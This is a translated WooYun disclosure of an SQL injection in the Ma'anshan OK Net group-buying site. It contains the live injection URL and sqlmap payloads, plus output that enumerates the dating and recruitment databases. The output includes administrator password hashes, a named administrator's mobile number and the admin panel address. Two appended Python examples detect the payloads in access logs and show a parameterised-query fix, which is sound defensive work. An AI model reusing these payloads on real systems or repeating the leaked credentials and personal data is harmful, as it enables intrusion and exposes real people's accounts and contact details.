Vulnerability summary

Defect ID: wooyun-2014-082243

Title: SQL injection on Ma'anshan OK Net (马鞍山OK网) compromises several modules (user information disclosure)

Vendor: Ma'anshan OK Net (马鞍山OK网)

Author: an0nym0u5

Submitted: 2014-11-07 10:18

Fix time: 2014-12-22 10:22

Published: 2014-12-22 10:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-22: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A single SQL injection in this forum site lets the databases of several sub-sites (dating, recruitment, group-buying and others) be dumped directly, leaking user data.

Detailed description:

Ma'anshan OK Net: http://www.masok.cn/

[Screenshot: mas1.jpg]

Injection point:
http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan
Injected parameter: cityname
Let's enumerate the databases first:
GET parameter 'cityname' is vulnerable. Do you want to keep testing the others?
[y/N]
sqlmap identified the following injection points with a total of 315 HTTP(s) requests:
---
Place: GET
Parameter: cityname
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=Rss&a=index&cityname=maanshan' AND (SELECT 6840 FROM(SELECT COUNT
(*),CONCAT(CHAR(58,121,106,114,58),(SELECT (CASE WHEN (6840=6840) THEN 1 ELSE 0
END)),CHAR(58,111,120,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables
GROUP BY x)a) AND 'UWyf'='UWyf
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=Rss&a=index&cityname=maanshan' AND SLEEP(5) AND 'nGvl'='nGvl
---
[09:19:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[09:19:02] [INFO] fetching database names
[09:19:02] [INFO] the SQL query used returns 9 entries
[09:19:02] [INFO] retrieved: information_schema
[09:19:02] [INFO] retrieved: love
[09:19:03] [INFO] retrieved: masjob
[09:19:03] [INFO] retrieved: mysql
[09:19:03] [INFO] retrieved: performance_schema
[09:19:03] [INFO] retrieved: test
[09:19:03] [INFO] retrieved: tuangou
[09:19:03] [INFO] retrieved: ultrax
[09:19:04] [INFO] retrieved: ultrax_20140721
available databases [9]:
[*] information_schema
[*] love
[*] masjob
[*] mysql
[*] performance_schema
[*] test
[*] tuangou
[*] ultrax
[*] ultrax_20140721
These are the databases we get; each of them looks attractive, so let's go through them one at a time.
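As an added example that is not part of the original report: the two sqlmap techniques shown in the output above (error-based via the information_schema / FLOOR(RAND(0)*2) GROUP BY trick, and time-based blind via SLEEP) leave distinctive strings in the web server access log, which is where a defender would first notice the 315 requests. The Python below parses constructed Nginx combined-format lines (the client IP, timestamp, sizes and user agents are made up; the log format and the signature set are assumptions) and flags requests whose cityname parameter carries those patterns.

```python
import re
from urllib.parse import quote, urlsplit, parse_qsl, unquote_plus

# Nginx "combined" log format (an assumption; adjust LOG_RE to the real log_format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures for the two techniques sqlmap reported on this page, checked against the
# URL-decoded parameter value. They are deliberately narrow to keep false positives low.
SQLI_SIGNATURES = {
    "time-based-sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "error-based-dup-key": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "schema-enumeration": re.compile(r"\binformation_schema\b", re.I),
    "quoted-string-comparison": re.compile(r"'[^']*'\s*=\s*'"),
}


def classify_params(target):
    """Map parameter name -> matched signature names for one request target."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # second pass catches double-encoded payloads
        matched = [sig for sig, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]
        if matched:
            hits[name] = matched
    return hits


def scan_access_log(lines):
    """Return one finding per (request, parameter) that carries an injection pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format; a real deployment would count and inspect these
        for param, sigs in classify_params(m.group("target")).items():
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "param": param,
                "signatures": sigs,
                "ua": m.group("ua"),
            })
    return findings


def _constructed_line(cityname, status, ua):
    """Build a sample log line; IP, timestamp and response size are made up for this example."""
    target = "/index.php?m=Rss&a=index&cityname=" + quote(cityname, safe="")
    return (f'203.0.113.10 - - [07/Nov/2014:09:19:02 +0800] "GET {target} HTTP/1.1" '
            f'{status} 5123 "-" "{ua}"')


# Constructed sample: one benign request, then the two payload shapes printed by sqlmap above.
SAMPLE_LOG = [
    _constructed_line("maanshan", 200, "Mozilla/5.0"),
    _constructed_line("maanshan' AND SLEEP(5) AND 'nGvl'='nGvl", 200, "sqlmap/1.0-dev"),
    _constructed_line(
        "maanshan' AND (SELECT 6840 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,106,114,58),"
        "(SELECT (CASE WHEN (6840=6840) THEN 1 ELSE 0 END)),CHAR(58,111,120,104,58),"
        "FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'UWyf'='UWyf",
        500, "sqlmap/1.0-dev"),
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']} -> {', '.join(f['signatures'])} (HTTP {f['status']})")
```

The signatures are keyed on the decoded parameter value rather than the raw URL so that percent-encoding (which is what sqlmap actually sends) does not hide them; a burst of such hits from one address with a 500 status on the error-based probe is the pattern to alert on.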

[Screenshot: mas2.png]

Let's see what is in the love database; it is clearly the database of the dating section:
Database: love
[94 tables]
+--------------------------+
| oepre_admin |
| oepre_area |
| oepre_ask |
| oepre_ask_answer |
| oepre_ask_category |
| oepre_authgroup |
| oepre_ceshi_category |
| oepre_ceshi_comment |
| oepre_ceshi_content |
| oepre_ceshi_record |
| oepre_ceshi_subject |
| oepre_ceshi_truerate |
| oepre_complaints |
| oepre_dating |
| oepre_dating_category |
| oepre_dating_cond |
| oepre_dating_user |
| oepre_diary |
| oepre_diary_category |
| oepre_diary_comment |
| oepre_friend |
| oepre_gift |
| oepre_gift_category |
| oepre_gift_record |
| oepre_greet |
| oepre_hibox |
| oepre_home_payalbum |
| oepre_home_paycontact |
| oepre_home_payvideo |
| oepre_home_viewer |
| oepre_hometown |
| oepre_htmllabel |
| oepre_info |
| oepre_info_category |
| oepre_lang |
| oepre_log |
| oepre_love_paramter |
| oepre_love_sort |
| oepre_mail_content |
| oepre_mail_log |
| oepre_mail_tpl |
| oepre_message |
| oepre_message_allow |
| oepre_message_daysends |
| oepre_message_dayviews |
| oepre_message_hash |
| oepre_mobile_checkcode |
| oepre_myads |
| oepre_oauth |
| oepre_oauth_user |
| oepre_options |
| oepre_party |
| oepre_party_cancel |
| oepre_party_comment |
| oepre_party_signup |
| oepre_payment |
| oepre_payment_log |
| oepre_payment_plugin |
| oepre_promotion |
| oepre_promotion_settle |
| oepre_seo |
| oepre_single |
| oepre_single_category |
| oepre_sms_content |
| oepre_sms_log |
| oepre_sms_tpl |
| oepre_story |
| oepre_story_category |
| oepre_story_comment |
| oepre_system_content |
| oepre_system_msg |
| oepre_user |
| oepre_user_attr |
| oepre_user_certify |
| oepre_user_cond |
| oepre_user_group |
| oepre_user_logins |
| oepre_user_match |
| oepre_user_mbsms |
| oepre_user_money |
| oepre_user_online |
| oepre_user_params |
| oepre_user_photo |
| oepre_user_points |
| oepre_user_profile |
| oepre_user_status |
| oepre_user_validate |
| oepre_user_video |
| oepre_user_video_comment |
| oepre_user_videorz |
| oepre_user_viprecord |
| oepre_weibo |
| oepre_weibo_comment |
| oepre_zone |
+--------------------------+
Don't tables like oepre_admin and oepre_user look attractive? Let's keep going:
Database: love
Table: oepre_admin
[11 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| adminid | mediumint(8) unsigned |
| adminname | varchar(50) |
| flag | tinyint(1) unsigned |
| groupid | mediumint(8) unsigned |
| loginip | varchar(50) |
| logintimeline | int(10) unsigned |
| logintimes | int(10) unsigned |
| memo | varchar(500) |
| password | varchar(50) |
| super | tinyint(1) unsigned |
| timeline | int(10) unsigned |
+---------------+-----------------------+
See that? adminname and password. Next, grab the administrator accounts and their (hashed) passwords:
Database: love
Table: oepre_admin
[4 entries]
+-----------+----------------------------------+
| adminname | password |
+-----------+----------------------------------+
| admin | 12914125d9407721c741e3dff2fe04b2 |
| OK红娘 | 705e6d888f55980773a11dd588c4739e |
| 蝴蝶飞飞 | 7d6a0bde9a6f886d18dcaff38c2805fc |
| 文言文语 | b6de6cb121aabea28282d82549713b0a |
+-----------+----------------------------------+
Now the ordinary users:
Database: love
Table: oepre_user
[13 columns]
+------------+------------------------+
| Column | Type |
+------------+------------------------+
| avatar | varchar(200) |
| avatarflag | tinyint(1) unsigned |
| email | varchar(100) |
| gender | tinyint(1) unsigned |
| groupid | smallint(2) unsigned |
| integrity | tinyint(1) unsigned |
| mbsms | mediumint(8) unsigned |
| money | decimal(18,2) unsigned |
| password | varchar(32) |
| points | decimal(18,2) unsigned |
| salt | varchar(10) |
| userid | int(10) unsigned |
| username | varchar(20) |
+------------+------------------------+
Again there are username and password columns, which is genuinely exciting.
[09:29:32] [INFO] the SQL query used returns 3020 entries
The user base is not small either. Going further, the users' account names and passwords can be obtained; some screenshots are shown:

[Screenshot: mas3.png]

Below is part of a screenshot of the Excel export:

[Screenshot: mas4.jpg]

[Screenshot: mas5.jpg]


Now look at the other database, masjob, which should be the recruitment section:
Database: masjob
[104 tables]
+---------------------+
| job_ad |
| job_admin |
| job_adplace |
| job_adsplace |
| job_announce |
| job_attention |
| job_building |
| job_card |
| job_channel |
| job_comment |
| job_common |
| job_comnews |
| job_consume |
| job_count |
| job_countnum |
| job_course |
| job_coursetype |
| job_crons |
| job_department |
| job_dept |
| job_downfiles |
| job_downtype |
| job_dynamic |
| job_ecoclass |
| job_edu |
| job_education |
| job_evalua |
| job_feval |
| job_foreigndegree |
| job_foreignlanguage |
| job_gift |
| job_gift_category |
| job_gift_orders |
| job_group |
| job_guestbook |
| job_help |
| job_helpsort |
| job_hire |
| job_hrzp |
| job_interview |
| job_label |
| job_lang |
| job_letter |
| job_level |
| job_links |
| job_location |
| job_mail |
| job_mail_list |
| job_mail_log |
| job_mail_server |
| job_mailtemp |
| job_mamber_subinfo |
| job_manage_log |
| job_marriage |
| job_member |
| job_mutual |
| job_myexpert |
| job_myfavorite |
| job_myinterview |
| job_myreceive |
| job_mysend |
| job_nation |
| job_news |
| job_newssort |
| job_orderservice |
| job_pay |
| job_payback |
| job_payonline |
| job_picture |
| job_plus_weblog |
| job_polity |
| job_position |
| job_prices |
| job_profession |
| job_professor |
| job_provinceandcity |
| job_rbrower |
| job_recycle |
| job_reply |
| job_require |
| job_resume |
| job_rule_news |
| job_rule_office |
| job_save_url |
| job_sendresume |
| job_service_log |
| job_signup |
| job_site |
| job_siteconfig |
| job_sms |
| job_smstemp |
| job_street |
| job_student |
| job_sysletter |
| job_trade |
| job_trainer |
| job_training |
| job_url |
| job_vhire |
| job_vote |
| job_vresume |
| job_work |
| job_zph |
| job_zphorder |
+---------------------+
job_admin is the administrator table:
Database: masjob
Table: job_admin
[12 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| a_flag | varchar(8000) |
| a_flags | varchar(20) |
| a_id | int(10) unsigned |
| a_kf | tinyint(1) |
| a_mobile | varchar(15) |
| a_name | varchar(20) |
| a_pass | varchar(32) |
| a_qq | varchar(12) |
| a_site | smallint(4) |
| a_tel | varchar(20) |
| a_type | varchar(20) |
| a_user | varchar(20) |
+----------+------------------+
Wow: real name, username, password, mobile number, QQ number, everything. Let's dig it out:
Database: masjob
Table: job_admin
[3 entries]
+-------------+--------+----------------------------------+------+--------+
| a_mobile | a_name | a_pass | a_qq | a_user |
+-------------+--------+----------------------------------+------+--------+
| 13855570144 | 刘治国 | 2bb5f77d14939c74db4ed9cfae091278 | None | dyslzg |
| None | 明星 | 5ecd2f5496def504f882ebfa438512bd | None | limgxg |
| None | None | f9a77f1c4a055a793c65592fcf98cb73 | None | wumf |
+-------------+--------+----------------------------------+------+--------+
Testing: the password for username dyslzg can be cracked; it is not listed here.
Back-end admin URL: http://job.masok.cn/admin/

[Screenshot: mas8.jpg]

[Screenshot: mas9.jpg]

Now the members, table job_member:
Database: masjob
Table: job_member
[99 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| m_activedate | datetime |
| m_address | varchar(200) |
| m_answer | varchar(50) |
| m_balance | int(10) |
| m_birth | date |
| m_bold | tinyint(1) |
| m_brand | varchar(100) |
| m_building | varchar(20) |
| m_cardtype | tinyint(1) |
| m_chat | varchar(20) |
| m_color | varchar(7) |
| m_comm | tinyint(1) |
| m_commend | date |
| m_commstart | date |
| m_confirm | tinyint(1) |
| m_contact | varchar(50) |
| m_contactnum | smallint(4) |
| m_contactnums | mediumint(6) |
| m_ecoclass | varchar(20) |
| m_edu | tinyint(2) |
| m_email | varchar(100) |
| m_emailauth | tinyint(1) |
| m_emailshowflag | tinyint(1) |
| m_enddate | date |
| m_expertnum | smallint(4) |
| m_expertnums | mediumint(6) |
| m_fax | varchar(50) |
| m_flag | tinyint(1) |
| m_founddate | date |
| m_fund | mediumint(6) |
| m_groupid | tinyint(2) |
| m_hirenum | smallint(4) |
| m_hirenums | mediumint(6) |
| m_hits | int(10) |
| m_hukou | varchar(100) |
| m_id | int(10) unsigned |
| m_idcard | varchar(20) |
| m_integral | int(10) |
| m_interviewnums | mediumint(6) |
| m_introduce | mediumtext |
| m_inviteid | int(10) unsigned |
| m_ishire | smallint(4) |
| m_lastlogindate | int(10) unsigned |
| m_letternums | tinyint(2) |
| m_level | varchar(50) |
| m_licence | varchar(100) |
| m_limit | varchar(255) |
| m_login | varchar(50) |
| m_logindate | datetime |
| m_loginip | varchar(15) |
| m_loginnum | int(10) |
| m_logo | varchar(50) |
| m_logocomm | tinyint(1) |
| m_logoenddate | date |
| m_logoflag | tinyint(1) |
| m_logostartdate | date |
| m_logostatus | tinyint(1) |
| m_map | varchar(50) |
| m_marriage | varchar(10) |
| m_mobile | varchar(20) |
| m_mobileauth | tinyint(1) |
| m_mobileshowflag | tinyint(1) |
| m_myfavoritenum | smallint(4) |
| m_myfavoritenums | mediumint(6) |
| m_myinterviewnum | smallint(4) |
| m_myinterviewnums | mediumint(6) |
| m_mysendnum | smallint(4) |
| m_mysendnums | mediumint(6) |
| m_name | varchar(200) |
| m_nameshow | tinyint(1) |
| m_openid | varchar(100) |
| m_operator | varchar(20) |
| m_otherwelfare | varchar(100) |
| m_polity | varchar(10) |
| m_post | varchar(6) |
| m_pwd | varchar(32) |
| m_question | varchar(50) |
| m_qzstate | varchar(255) |
| m_recyclenum | smallint(4) |
| m_recyclenums | mediumint(6) |
| m_regdate | datetime |
| m_resumenums | mediumint(6) |
| m_seat | varchar(100) |
| m_sendemail | tinyint(1) |
| m_sex | tinyint(1) |
| m_site | smallint(4) |
| m_smsnum | smallint(4) |
| m_smsnums | mediumint(6) |
| m_startdate | date |
| m_street | varchar(20) |
| m_subtype | varchar(50) |
| m_tel | varchar(100) |
| m_telshowflag | tinyint(1) |
| m_template | varchar(20) |
| m_trade | varchar(50) |
| m_typeid | tinyint(1) |
| m_url | varchar(100) |
| m_welfare | varchar(255) |
| m_workers | varchar(10) |
+-------------------+------------------+
The members' full details are all in here, for example m_address, m_birth, m_contactnum, m_email, m_hukou, m_idcard, m_mobile, m_login, m_name, m_pwd and m_tel: name, password, national ID number, household registration (hukou), mobile number, date of birth and so on.
[10:02:02] [INFO] the SQL query used returns 30130 entries
The user base here is even larger, more than 30,000, and all the details are right there.
Some screenshots:

[Screenshot: mas6.jpg]

[Screenshot: mas7.jpg]

Finally, all the information is automatically exported to Excel. Everyone understands what could be done with it.
The tuangou database is the same story; it should be the group-buying section. Omitted here.

Proof of vulnerability:

(The proof section of the original report repeats the detailed description above verbatim: the same injection point http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan, the same cityname parameter, the same sqlmap output, table listings and screenshots mas1 to mas9.)

Fix recommendation:

Parameter filtering.
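The fix recommendation above is a single phrase; as an added example (not the site's or the report author's code) the Python below uses an in-memory sqlite3 table as a stand-in for the MySQL backend and contrasts the concatenated query that makes the cityname parameter injectable with a parameterised query and an allow-list check on the parameter. The table name, its columns, the two city rows and the length bound in the allow-list are constructed for this demonstration.

```python
import re
import sqlite3


# sqlite3 in memory stands in for the site's MySQL backend (assumption); the table,
# its columns and the two city rows are constructed for this demonstration.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE city (id INTEGER PRIMARY KEY, name TEXT NOT NULL, title TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO city (name, title) VALUES (?, ?)",
        [("maanshan", "Ma'anshan group-buy feed"), ("hefei", "Hefei group-buy feed")],
    )
    return conn


def rss_titles_vulnerable(conn, cityname):
    """The defect the report describes: the parameter is concatenated into the SQL text,
    so a single quote in cityname closes the literal and the rest is parsed as SQL."""
    sql = "SELECT title FROM city WHERE name = '" + cityname + "'"
    return [row[0] for row in conn.execute(sql)]


def rss_titles_parameterized(conn, cityname):
    """Fix 1: a bound parameter is sent as data and never parsed as SQL."""
    rows = conn.execute("SELECT title FROM city WHERE name = ?", (cityname,))
    return [row[0] for row in rows]


# Fix 2 ("parameter filtering"): cityname is a URL slug, so an allow-list of lowercase
# ASCII letters is the right shape; the 32-character bound is an assumption.
CITYNAME_RE = re.compile(r"[a-z]{1,32}")


def is_valid_cityname(cityname):
    return CITYNAME_RE.fullmatch(cityname) is not None


def rss_titles_fixed(conn, cityname):
    """Both fixes together: reject malformed input early, then bind the value."""
    if not is_valid_cityname(cityname):
        raise ValueError("cityname must be 1-32 lowercase ASCII letters")
    return rss_titles_parameterized(conn, cityname)


# A boolean probe pair in the shape of the sqlmap payloads from the report: in the
# vulnerable version a true condition keeps the row and a false one drops it, so the
# response reveals the truth of injected SQL; the fixed versions return nothing for either.
TRUE_PROBE = "maanshan' AND 'nGvl'='nGvl"
FALSE_PROBE = "maanshan' AND 'nGvl'='xxxx"

if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable, true probe :", rss_titles_vulnerable(db, TRUE_PROBE))
    print("vulnerable, false probe:", rss_titles_vulnerable(db, FALSE_PROBE))
    print("parameterized, probe   :", rss_titles_parameterized(db, TRUE_PROBE))
    print("fixed, valid input     :", rss_titles_fixed(db, "maanshan"))
    print("probe passes allow-list:", is_valid_cityname(TRUE_PROBE))
```

The bound parameter alone closes the injection; the allow-list is defence in depth that also gives a clean 4xx response and a log line for malformed values instead of handing them to the database at all.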

Copyright notice: when reposting, please credit the source: an0nym0u5@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond.